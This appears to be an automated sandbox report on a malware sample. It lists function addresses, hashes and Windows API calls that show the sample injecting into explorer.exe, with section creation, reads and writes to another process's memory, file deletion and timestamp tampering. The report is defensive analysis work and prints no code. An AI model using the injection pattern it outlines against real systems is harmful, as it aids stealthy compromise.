Instruction ID: ec7c9f9116aa5c3d7af92c99ccf4db412f3ff1557a2b92ce3f8b18b7d449fb36
Opcode Fuzzy Hash: 2e3e027024aa3d6704b47e5880310210fdf2d46df9c3430db9cfbdec36fb4464
Instruction Fuzzy Hash: 97016DB2308305EBE7006A959C51EBA3758AB41764F308133B607780F1957D9A17B36F

Function 004018BE Relevance: 1.3, APIs: 1, Instructions: 56
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 004018F6

Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB

Memory Dump Source

Source File: 0000000D.00000002.2019231049.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 63246ced83773f111c728f1a43d3fcfa9d239b90abfb008a8a8fe5df5a230609
Instruction ID: cc5cf84a4ac16d3ff6e0150408ab5a4d949569ac012fe2ee23f61dbe8ee8ec54
Opcode Fuzzy Hash: 63246ced83773f111c728f1a43d3fcfa9d239b90abfb008a8a8fe5df5a230609
Instruction Fuzzy Hash: 70014CB2308205EBDB106A959C51EBE3659AB55714F308133B607784F1967D9B13F32B

Function 004018B1 Relevance: 1.3, APIs: 1, Instructions: 55
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 004018F6

Memory Dump Source

Source File: 0000000D.00000002.2019231049.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 551bf9fc6a161abfac80695604f19aa1aef5469406db7a931b83d04652b6e09e
Instruction ID: ef1b3772686a797e33556ea01ceab6b668eb93d7b49977ee198856b5a882b22d
Opcode Fuzzy Hash: 551bf9fc6a161abfac80695604f19aa1aef5469406db7a931b83d04652b6e09e
Instruction Fuzzy Hash: 210125B2208245EADB006A959C61EBA3799AB41724F308137F607790F1967E8A13F31B

Function 004018C2 Relevance: 1.3, APIs: 1, Instructions: 51
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 004018F6

Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB

Memory Dump Source

Source File: 0000000D.00000002.2019231049.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: bb19dfe290bac6874ef398e2d88654dc8a7b23ebc8c26647aeabf95c1afcae67
Instruction ID: d3c1b2561fc0583f1f6bbc3edf5ccb050f557452f45edf8007d0f6b78c0567ac
Opcode Fuzzy Hash: bb19dfe290bac6874ef398e2d88654dc8a7b23ebc8c26647aeabf95c1afcae67
Instruction Fuzzy Hash: 14017CB2308205EBDB006A919C51EBE3759AB41724F308133F607780F1967D8A13F31B

Function 004018DA Relevance: 1.3, APIs: 1, Instructions: 43
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 004018F6

Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB

Memory Dump Source

Source File: 0000000D.00000002.2019231049.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: fbcf8db84f0bcb0a2d0b0e49b2c778a116fa09cd0714ede85e20fc239748f007
Instruction ID: 8f9a98739febab8b32419077b991bda00f1387bd451c7178a571841fb0c6b49c
Opcode Fuzzy Hash: fbcf8db84f0bcb0a2d0b0e49b2c778a116fa09cd0714ede85e20fc239748f007
Instruction Fuzzy Hash: A8F044B6204205EBDB006E959C51FAE3768AB44725F344133F612790F1C67D8A52F71B

Non-executed Functions

Function 004022D9 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2019231049.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7860815ad4231e939db7468cf30c1f9d63862ef5de29645b67a78e94f400ad0
Instruction ID: 407047d8813846ed623c6620c5c661c30d6a874651c06bbb2e7ade0d14a7dce7
Opcode Fuzzy Hash: c7860815ad4231e939db7468cf30c1f9d63862ef5de29645b67a78e94f400ad0
Instruction Fuzzy Hash: 92117D2020C541FCD321D27CCA0C911BFA99B4F72075401FBD691250C3DAB9094AEBAB

Function 004022D8 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2019231049.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62f82913357ed83049cd1887261115a72de1e32be9748c9b7b11558f6f6d0137
Instruction ID: 5db6927ec116302fd1a3f9be718c7712ee400501de5b38768fcc91fc62191cbb
Opcode Fuzzy Hash: 62f82913357ed83049cd1887261115a72de1e32be9748c9b7b11558f6f6d0137
Instruction Fuzzy Hash: 56117D2024C581ECD321D37CCA48914BFA69B4F72076801FBD691694C3CAB9454AEBAB

Function 004022E5 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2019231049.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 039acd9b67e764601ba82469f9de9df4a99d24579219de54cf11ac1d4119bc91
Instruction ID: 863a443b315763638c31dffea77139fa9fc7248c2f9879795720f54bbf800da4
Opcode Fuzzy Hash: 039acd9b67e764601ba82469f9de9df4a99d24579219de54cf11ac1d4119bc91
Instruction Fuzzy Hash: 4F115C2020C941ADD321D37CCA08914BFA59B4F72075802FBD6915A0C6CA79454AEF97

Function 004022F7 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2019231049.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e540363add078f276303d02989b505c159875bf8d0edc9c9c36215123116058
Instruction ID: 0c8bb5551e2abd97a64ae9c19d193427848800bdc9eaee9e975189e24a5225cd
Opcode Fuzzy Hash: 3e540363add078f276303d02989b505c159875bf8d0edc9c9c36215123116058
Instruction Fuzzy Hash: 56112C2020C581EDD321D27CCA09514BF959B4F72475801FBD691690C6DA79454AEB9B

Function 00402321 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2019231049.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25919fc75364af992eb4b4042875d07686e0c12065a18c89e44093fc2b7c95b2
Instruction ID: f976abf0b506ce6ff8f37bbd7c8af7624669eab2ab4b5b0fb9c0d747e7254d45
Opcode Fuzzy Hash: 25919fc75364af992eb4b4042875d07686e0c12065a18c89e44093fc2b7c95b2
Instruction Fuzzy Hash: 1601472124C991BCE331E33CC908904BFE69B4FB6475802FAD2A15A0C7DA214589DFE7

Function 004025D3 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2019231049.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4027c6423f46035466e643bdd863a4de9ba613b5b2dc0b913ca9580a9ba2c0d
Instruction ID: c5c43ab6752ee8d18fcb74b59ff98ad39f6596117cd62c5b2c77ced72334e6aa
Opcode Fuzzy Hash: f4027c6423f46035466e643bdd863a4de9ba613b5b2dc0b913ca9580a9ba2c0d
Instruction Fuzzy Hash: B111E2321002609FDF21AF24C49569AFBB2FF4530C375A188C9969B111E722AD8FCB91

Function 00402920 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2019231049.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79cd9034bfff8985795d7f01a2b5bacfc6e9aaff332886851db4d16c3fecaafc
Instruction ID: 20a1f56e34deb81daffe23ddf7f3a634b4938193a6ef7f98b4fa68dc7b801d93
Opcode Fuzzy Hash: 79cd9034bfff8985795d7f01a2b5bacfc6e9aaff332886851db4d16c3fecaafc
Instruction Fuzzy Hash: 09F078B2A04347EBD715AAF482844AEBB20A740731BA4265BD5E6E62E1D779C504D704

Function 00402686 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2019231049.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e7a0acffb87ace860446896612c735c16b272113d31e621940bc7827f3f290d
Instruction ID: c48700b05c06e988df87cd580ca5e4308363d13747befdac9a33251d9afddee9
Opcode Fuzzy Hash: 1e7a0acffb87ace860446896612c735c16b272113d31e621940bc7827f3f290d
Instruction Fuzzy Hash: 8EF0227101036187CF18AB389498198BBA1EE46668798079EDDA2770D2E327A4A9CB90

Analysis Process: explorer.exePID: 2580, Parent PID: 5816COMMON

Execution Graph

Execution Coverage:	59.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	10.6%
Total number of Nodes:	142
Total number of Limit Nodes:	6

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 01212FAC Relevance: 7.9, APIs: 5, Instructions: 360
nativeinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 01214760: NtCreateSection.NTDLL ref: 012147D2

NtQueryInformationProcess.NTDLL ref: 012131A2
NtQueryInformationProcess.NTDLL ref: 012131CA
ReadProcessMemory.KERNEL32 ref: 012131FD
ReadProcessMemory.KERNEL32 ref: 0121322B
WriteProcessMemory.KERNEL32 ref: 012132A8

Memory Dump Source

Source File: 0000000E.00000002.2893429951.0000000001211000.00000020.80000000.00040000.00000000.sdmp, Offset: 01211000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1211000_explorer.jbxd

Yara matches

Similarity

API ID: Process$Memory$InformationQueryRead$CreateSectionWrite
String ID:
API String ID: 1349948393-0
Opcode ID: 506be8b745c86868212e6bbe2b973f53b88258c17a25ff51727040f97eaf2374
Instruction ID: ca1a9a5a5c3ed870babc41f38936812b288ab4525c2b7edd205cf77b810b71d8
Opcode Fuzzy Hash: 506be8b745c86868212e6bbe2b973f53b88258c17a25ff51727040f97eaf2374
Instruction Fuzzy Hash: D6B16331A18A4D9FDB18EF58D4456E9B7F2FBA8310F10427ED84AE3245DB70E90687C5

Function 01213BF4 Relevance: 7.6, APIs: 5, Instructions: 72
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 01213C16
Process32First.KERNEL32 ref: 01213C35
Process32Next.KERNEL32 ref: 01213C80
CloseHandle.KERNEL32 ref: 01213C8D
SleepEx.KERNEL32 ref: 01213C98

Memory Dump Source

Source File: 0000000E.00000002.2893429951.0000000001211000.00000020.80000000.00040000.00000000.sdmp, Offset: 01211000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1211000_explorer.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSleepSnapshotToolhelp32
String ID:
API String ID: 2482764027-0
Opcode ID: fa5a43c44172bddb499ae6b439e922885960bdcd79c62b2d5fce3e2e85a2ac8a
Instruction ID: 5251276a52cf2d1506424855efdec6ccf25c8505c5078e96ea5c689262ed6488
Opcode Fuzzy Hash: fa5a43c44172bddb499ae6b439e922885960bdcd79c62b2d5fce3e2e85a2ac8a
Instruction Fuzzy Hash: 6721E730124A098FEB18EF68C4887AA77D2FBA8325F04067ED54FDA149DB3495458751

Function 01214760 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 105
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateSection.NTDLL ref: 012147D2

Strings

@, xrefs: 012147EA
@, xrefs: 012147CA

Memory Dump Source

Source File: 0000000E.00000002.2893429951.0000000001211000.00000020.80000000.00040000.00000000.sdmp, Offset: 01211000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1211000_explorer.jbxd

Yara matches

Similarity

API ID: CreateSection
String ID: @$@
API String ID: 2449625523-149943524
Opcode ID: 7986f009ac0f096a0d93092820368ebc118aed73d931aaf233c3ded0dfe06134
Instruction ID: d33aa9147c84222dd28bd4ca71562c525a7864831df5cc20e1aeb99ecccb6eb2
Opcode Fuzzy Hash: 7986f009ac0f096a0d93092820368ebc118aed73d931aaf233c3ded0dfe06134
Instruction Fuzzy Hash: 7C318F70918B898FCB94EF5CC88566AB7E0FB68315F11066FE95EE3255DB70D840CB81

Function 012135E8 Relevance: 1.9, APIs: 1, Instructions: 412
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.COMBASE ref: 01213635

Memory Dump Source

Source File: 0000000E.00000002.2893429951.0000000001211000.00000020.80000000.00040000.00000000.sdmp, Offset: 01211000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1211000_explorer.jbxd

Yara matches

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: 96b0b93c05fdbe8b2e5bbbd88126f48c7d73587df48daa94093f37bd97c0f1d0
Instruction ID: c7dd2149c9475c3f00a7e52e87a14c5c1e5421348273ae2b51233692cdf7a2bf
Opcode Fuzzy Hash: 96b0b93c05fdbe8b2e5bbbd88126f48c7d73587df48daa94093f37bd97c0f1d0
Instruction Fuzzy Hash: CBE1EA34618A4C8FCF94EF28C895EA9B7F2FFA9304F114659E44ACB265DB70E944CB41

Function 01213490 Relevance: 1.6, APIs: 1, Instructions: 72COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32 ref: 012134E4

Part of subcall function 012135E8: CoCreateInstance.COMBASE ref: 01213635

Memory Dump Source

Source File: 0000000E.00000002.2893429951.0000000001211000.00000020.80000000.00040000.00000000.sdmp, Offset: 01211000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1211000_explorer.jbxd

Yara matches

Similarity

API ID: CreateInstanceNameUser
String ID:
API String ID: 3213660374-0
Opcode ID: 637ff5e754ff5e0219c9842562421e928cab8e2f9afbdf4f7e30de780da3cdf4
Instruction ID: 63c7713e606f9b1fa1784acf0256e23011aca2d0bd698ac91103fbd8cbeb2f82
Opcode Fuzzy Hash: 637ff5e754ff5e0219c9842562421e928cab8e2f9afbdf4f7e30de780da3cdf4
Instruction Fuzzy Hash: 4E111C31728B4D4FCB94EF6C90587AEB6D2FBEC210F504A6EA84DC3259DA7489458781

Function 012119D0 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 299
threadmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateHeap.NTDLL ref: 01211AE7
CreateThread.KERNEL32 ref: 01211CA2
CloseHandle.KERNEL32 ref: 01211CAB
CreateThread.KERNEL32 ref: 01211CC9

Strings

%g?, xrefs: 01211A37
iP+, xrefs: 01211C32

Memory Dump Source

Source File: 0000000E.00000002.2893429951.0000000001211000.00000020.80000000.00040000.00000000.sdmp, Offset: 01211000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1211000_explorer.jbxd

Yara matches

Similarity

API ID: Create$Thread$CloseHandleHeap
String ID: %g?$iP+
API String ID: 371905858-765743493
Opcode ID: 3a851293479e68066eaafbed160898214f53ca0f4bace3036e73d3865d9ba842
Instruction ID: b511e1a1db244a738ba75616a5bed0664d19cc97758a6ba495dee57a52d7db2c
Opcode Fuzzy Hash: 3a851293479e68066eaafbed160898214f53ca0f4bace3036e73d3865d9ba842
Instruction Fuzzy Hash: AB91C830628E0A8FDF54FF28D8816A577D6FBB8300B48017D9E4ECB15AEA34D551CB92

Function 01211F04 Relevance: 7.7, APIs: 5, Instructions: 172
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNEL32 ref: 01211F8E
CopyFileW.KERNEL32 ref: 01211F9D
DeleteFileW.KERNEL32 ref: 01211FAE
DeleteFileW.KERNEL32 ref: 01211FF9

Part of subcall function 01214920: SetFileAttributesW.KERNEL32 ref: 0121496F
Part of subcall function 01214920: CreateFileW.KERNEL32 ref: 01214999
Part of subcall function 01214920: SetFileTime.KERNEL32 ref: 012149C4

CreateFileW.KERNEL32 ref: 01212085

Memory Dump Source

Source File: 0000000E.00000002.2893429951.0000000001211000.00000020.80000000.00040000.00000000.sdmp, Offset: 01211000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1211000_explorer.jbxd

Yara matches

Similarity

API ID: File$Delete$Create$AttributesCopyTime
String ID:
API String ID: 642576546-0
Opcode ID: 2c993fa891f39b9d933a597d97ba76a6aba4de2b2223c2145dea24c63e54199f
Instruction ID: 43d289bce99a2dde7ef61f6b3982809f4aaf84b50d7e091f6134a70a23dc7c73
Opcode Fuzzy Hash: 2c993fa891f39b9d933a597d97ba76a6aba4de2b2223c2145dea24c63e54199f
Instruction Fuzzy Hash: 0A413C20728A4D4FDBA8EFAC945836E75D2EBE8610F50457EA90EC3389DE349D068781

Function 0121230C Relevance: 7.5, APIs: 3, Strings: 1, Instructions: 505
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNEL32 ref: 012124E9
CreateFileW.KERNEL32 ref: 01212512
WriteFile.KERNEL32 ref: 01212572

Strings

|:|, xrefs: 0121242C

Memory Dump Source

Source File: 0000000E.00000002.2893429951.0000000001211000.00000020.80000000.00040000.00000000.sdmp, Offset: 01211000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1211000_explorer.jbxd

Yara matches

Similarity

API ID: File$CreateDeleteWrite
String ID: |:|
API String ID: 2199199414-3736120136
Opcode ID: 68de4d4afa44634a81d69be9055df3b69c70ab86dd911ad0842af107fab504d1
Instruction ID: 0a251c223de8a1c7af147a96954e3c47c352258054c3e85e440000159781c956
Opcode Fuzzy Hash: 68de4d4afa44634a81d69be9055df3b69c70ab86dd911ad0842af107fab504d1
Instruction Fuzzy Hash: 0FE1A430728F498FD719EB6C84586BA76D1FBA8311F10062EE59FC3285DF74E9028786

Function 01211D8C Relevance: 4.6, APIs: 3, Instructions: 121
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 01214C90: GetVolumeInformationA.KERNEL32 ref: 01214CFD

CreateMutexExA.KERNEL32 ref: 01211DFF
CreateFileMappingA.KERNEL32 ref: 01211EB1
SleepEx.KERNEL32 ref: 01211EEE

Memory Dump Source

Source File: 0000000E.00000002.2893429951.0000000001211000.00000020.80000000.00040000.00000000.sdmp, Offset: 01211000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1211000_explorer.jbxd

Yara matches

Similarity

API ID: Create$FileInformationMappingMutexSleepVolume
String ID:
API String ID: 3744091137-0
Opcode ID: bec04341e68e41191309d4d7042bdcbdacfc5724437166af108988488ca901a6
Instruction ID: 3e4d9a0ad5b6f19f8b310d802d6b962b7734163c5153c6eae85a28f37a3936d0
Opcode Fuzzy Hash: bec04341e68e41191309d4d7042bdcbdacfc5724437166af108988488ca901a6
Instruction Fuzzy Hash: A5417230724F098FEB64EB78C0587BE76D2EBB8706F104A2E915FD6249CF7496029781

Function 01214920 Relevance: 4.6, APIs: 3, Instructions: 84
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFileAttributesW.KERNEL32 ref: 0121496F
CreateFileW.KERNEL32 ref: 01214999
SetFileTime.KERNEL32 ref: 012149C4

Memory Dump Source

Source File: 0000000E.00000002.2893429951.0000000001211000.00000020.80000000.00040000.00000000.sdmp, Offset: 01211000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1211000_explorer.jbxd

Yara matches

Similarity

API ID: File$AttributesCreateTime
String ID:
API String ID: 1986686026-0
Opcode ID: aef3a88ecf34d46dcc14474b3be831e8934c1aef16e8b3208ee60c12b5e4277e
Instruction ID: 11a4bf7d34150c161976d359d50e2376006e7afa233bb9326084cfe92f716f4f
Opcode Fuzzy Hash: aef3a88ecf34d46dcc14474b3be831e8934c1aef16e8b3208ee60c12b5e4277e
Instruction Fuzzy Hash: 9E21F13071CB488FDF64EF68988879E76E2FBE8701F10456EA85ED7245DA34DA058782

Function 01212CD0 Relevance: 3.3, APIs: 2, Instructions: 254
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 012132EC: CreateFileW.KERNEL32 ref: 01213332
Part of subcall function 012132EC: ReadFile.KERNEL32 ref: 01213379

ResumeThread.KERNEL32 ref: 01212EFE
SleepEx.KERNEL32 ref: 01212F43

Memory Dump Source

Source File: 0000000E.00000002.2893429951.0000000001211000.00000020.80000000.00040000.00000000.sdmp, Offset: 01211000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1211000_explorer.jbxd

Yara matches

Similarity

API ID: File$CreateReadResumeSleepThread
String ID:
API String ID: 3143597149-0
Opcode ID: a3a1c5e17b7eb0d277520424006382d2b60eeb30d806cae851d29cab29a01f4e
Instruction ID: b8d982cf4be1e2ce235116dd7c03eb4a73ba64f627e564d0599c40ec4072cbfe
Opcode Fuzzy Hash: a3a1c5e17b7eb0d277520424006382d2b60eeb30d806cae851d29cab29a01f4e
Instruction Fuzzy Hash: FF719630318F4A9FD769EB28C4587BAB7D2FBA8311F54452DE49EC3245DF34A8428782

Function 012132EC Relevance: 3.2, APIs: 2, Instructions: 157
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32 ref: 01213332
ReadFile.KERNEL32 ref: 01213379

Memory Dump Source

Source File: 0000000E.00000002.2893429951.0000000001211000.00000020.80000000.00040000.00000000.sdmp, Offset: 01211000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1211000_explorer.jbxd

Yara matches

Similarity

API ID: File$CreateRead
String ID:
API String ID: 3388366904-0
Opcode ID: 97e3ee78e2a824059bb89df07087900ddd79eba1d88e909009dc489151522fc3
Instruction ID: 415daabd554e26c1a9b76537a60554054290b72827a502e1ea8c425933796258
Opcode Fuzzy Hash: 97e3ee78e2a824059bb89df07087900ddd79eba1d88e909009dc489151522fc3
Instruction Fuzzy Hash: 8C41A43072CF0E4FD758EB6C98593BAB6D2FBE9221F14026EA59BC3245DE64981247C1

Function 01214E00 Relevance: 3.1, APIs: 2, Instructions: 122
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryValueExA.KERNEL32 ref: 01214E85
ObtainUserAgentString.URLMON ref: 01214EEE

Memory Dump Source

Source File: 0000000E.00000002.2893429951.0000000001211000.00000020.80000000.00040000.00000000.sdmp, Offset: 01211000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1211000_explorer.jbxd

Yara matches

Similarity

API ID: AgentObtainQueryStringUserValue
String ID:
API String ID: 4107646653-0
Opcode ID: 7053384ea0e9f833c31672209a37f03a32c16d8813cdeaa02f55fad0c755537e
Instruction ID: 2f6f8f12b9c80d24c33c7509545442238dfd445ad40db0cb74af8e72edce694e
Opcode Fuzzy Hash: 7053384ea0e9f833c31672209a37f03a32c16d8813cdeaa02f55fad0c755537e
Instruction Fuzzy Hash: A631763161CA4D8FDB18FF68D8496F977D5FBA8310B00027AE95ED3549EF6098054791

Function 01214A40 Relevance: 3.1, APIs: 2, Instructions: 84
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTokenInformation.KERNELBASE ref: 01214A94
GetTokenInformation.KERNELBASE ref: 01214ACB

Memory Dump Source

Source File: 0000000E.00000002.2893429951.0000000001211000.00000020.80000000.00040000.00000000.sdmp, Offset: 01211000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1211000_explorer.jbxd

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: 68ca21c3e1851e8b1733aa8d0b218e84f9a464e173bc11e28978421e877b90ef
Instruction ID: fa210b08ae9005c9f3e3f583b1d2b8d5d48b7fe6f68815c2fb0093d2ef37bc8f
Opcode Fuzzy Hash: 68ca21c3e1851e8b1733aa8d0b218e84f9a464e173bc11e28978421e877b90ef
Instruction Fuzzy Hash: D6213130618B498FC754EB28C49866AB7F1FBD9311B000A6EE59AC7264DB70E845DB81

Function 01213CD0 Relevance: 3.0, APIs: 2, Instructions: 25
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnumWindows.USER32 ref: 01213CEC
SleepEx.KERNEL32 ref: 01213CF7

Memory Dump Source

Source File: 0000000E.00000002.2893429951.0000000001211000.00000020.80000000.00040000.00000000.sdmp, Offset: 01211000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1211000_explorer.jbxd

Yara matches

Similarity

API ID: EnumSleepWindows
String ID:
API String ID: 498413330-0
Opcode ID: bcd33d68b26800d53c1a0055312e6970b5242bc1254dfeb745dd1bbf27494588
Instruction ID: 189496698ec61c2978d95356556b06472c48f9dec15f5c9c44051340f94b032d
Opcode Fuzzy Hash: bcd33d68b26800d53c1a0055312e6970b5242bc1254dfeb745dd1bbf27494588
Instruction Fuzzy Hash: C4E04F305146098FFB28EBA5C0D8BB036E2FB28216F24017ADD0EDD28ACB764945C720

Function 01213F7C Relevance: 2.0, APIs: 1, Instructions: 455
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000E.00000002.2893429951.0000000001211000.00000020.80000000.00040000.00000000.sdmp, Offset: 01211000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1211000_explorer.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9091676639883dede0ac74a3910d6ff904a65868e732797b04c243de0a589481
Instruction ID: 8bc3c4f603bb436d27b50b8bcec4a218db8280f05f94d179013cc2cf69182de9
Opcode Fuzzy Hash: 9091676639883dede0ac74a3910d6ff904a65868e732797b04c243de0a589481
Instruction Fuzzy Hash: C7D18230728B4A8FDB54EF6CD4456AEB7E2FBA8701F10452DE54AD3245DF74E8428B82

Function 01214578 Relevance: 1.6, APIs: 1, Instructions: 119processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNEL32 ref: 0121465C

Memory Dump Source

Source File: 0000000E.00000002.2893429951.0000000001211000.00000020.80000000.00040000.00000000.sdmp, Offset: 01211000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1211000_explorer.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 20bc06d3c9603a1f93a838c7453b69685924109dff400b81ce65c25d4e0f13d4
Instruction ID: 006c269a5644f10625c580c7916bb851e0541b9078e3de0914172d826a738c49
Opcode Fuzzy Hash: 20bc06d3c9603a1f93a838c7453b69685924109dff400b81ce65c25d4e0f13d4
Instruction Fuzzy Hash: 73316D70718F494FCB54EF6C908876AB6D2FBA8311F104A6EA44ED3249DBB4D8458781

Function 01214C90 Relevance: 1.6, APIs: 1, Instructions: 99COMMON

Download Yara Rule

APIs

GetVolumeInformationA.KERNEL32 ref: 01214CFD

Memory Dump Source

